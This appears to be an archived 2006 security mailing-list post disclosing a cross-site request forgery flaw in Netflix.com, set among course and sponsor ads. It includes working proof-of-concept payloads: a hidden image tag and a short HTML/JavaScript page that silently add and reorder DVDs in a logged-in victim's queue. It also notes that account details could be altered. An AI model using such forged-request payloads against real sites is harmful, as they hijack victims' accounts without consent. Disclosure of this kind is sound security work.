Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Web-App-Sec
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Netflix.com XSRF vuln

from [Dave Ferguson] Network Security [Permanent Link]
Subject: Netflix.com XSRF vuln
Date: Mon, 16 Oct 2006 08:51:41 -0500 
I just posted information to the Full Disclosure list about a Cross
Site Request Forgery (XSRF) vulnerability on Netflix.com.  Netflix has
recently fixed several of the most serious issues.

Some of you in the U.S. may be Netflix subscribers.  Here are some of
the things that could have been done to you if you visited the wrong
web page.

- add movies to your rental queue
- add a movie to the top of your rental queue
- change the name and address on your account
- change the email address and password on your account (i.e., take
over your account)
- cancel your account (Unconfirmed/Conjectured)

The exploits are extremely simple and are especially effective if the
victim chooses to stay logged on to the Netflix site.  For example, to
add a DVD to a victim's queue, an attacker would add an image tag to
his web page and just wait for Netflix subscribers to visit the page.

<img src="http://www.netflix.com/AddToQueue?movieid=70011204";
width="1" height="1" border="0">

Adding a DVD to the top of the queue takes a little JavaScript, but is
even nastier because it would probably be shipped before the victim
knew what had happened.

<html>
<head>
<script language="JavaScript" type="text/javascript">
function load_image2()
{
 var img2 = new Image();
 img2.src="http://www.netflix.com/MoveToTop?movieid=70023965&fromq=true";;
}
</script>
</head>
<body>
<img src="http://www.netflix.com/AddToQueue?movieid=70023965";
width="1" height="1" border="0">
<script>
setTimeout( 'load_image2()', 2000 );
</script>
</body>
</html>

I think XSRF could be a sleeping giant, kind of like XSS was a year or
two ago.  Jesse Burns has a great whitepaper about XSRF here:
http://www.isecpartners.com/documents/XSRF_Paper.pdf

Regards,

Dave Ferguson

-------------------------------------------------------------------------
Sponsored by: Watchfire

Watchfire was recently named the worldwide market leader in Web application security assessment tools by both Gartner and IDC. Download a free trial of AppScan today and see why more customers choose AppScan then any other solution.

https://www.watchfire.com/securearea/appscancamp.aspx?id=701500000008YTO
--------------------------------------------------------------------------

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Netflix.com XSRF vuln, Dave Ferguson <=
Previous by Date:  Re: Magic Quotes, Brad Lhotsky
Next by Date:  Re: Magic Quotes, DokFLeed
Previous by Thread:  [Full-disclosure] AttackAPI 0.8 is OUT, pdp (architect)
Next by Thread:  Teros or Citrix Application Firewall, bill . fetters
Indexes:  [Date] [Thread] [Top] [All Lists]